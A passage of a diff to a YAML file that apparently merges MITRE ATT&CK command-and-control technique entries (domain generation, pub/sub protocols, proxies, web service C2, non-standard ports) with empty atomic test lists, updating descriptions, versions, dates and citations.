-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -37187,9 +37610,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -37235,7 +37716,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -37267,7 +37747,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -37289,22 +37769,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37326,7 +37804,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -37351,7 +37829,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -37435,7 +37912,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -37499,11 +37975,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37587,7 +38062,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -37618,7 +38092,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -37638,8 +38112,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37661,8 +38135,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -37724,7 +38196,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -37772,7 +38243,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -37826,7 +38296,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -37859,7 +38328,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37879,8 +38348,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -37918,7 +38385,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37946,42 +38413,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -37990,17 +38437,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -38032,7 +38501,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -38049,8 +38518,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -38070,7 +38537,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -38093,8 +38560,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -38119,7 +38584,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38144,8 +38609,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -38210,7 +38673,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -38234,7 +38696,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -38259,21 +38721,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -38292,7 +38769,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -38306,6 +38783,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -38319,12 +38801,11 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests: []
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -38374,11 +38855,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -38387,20 +38867,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -38425,17 +38905,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests: []
   T1573:
@@ -38491,7 +38970,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
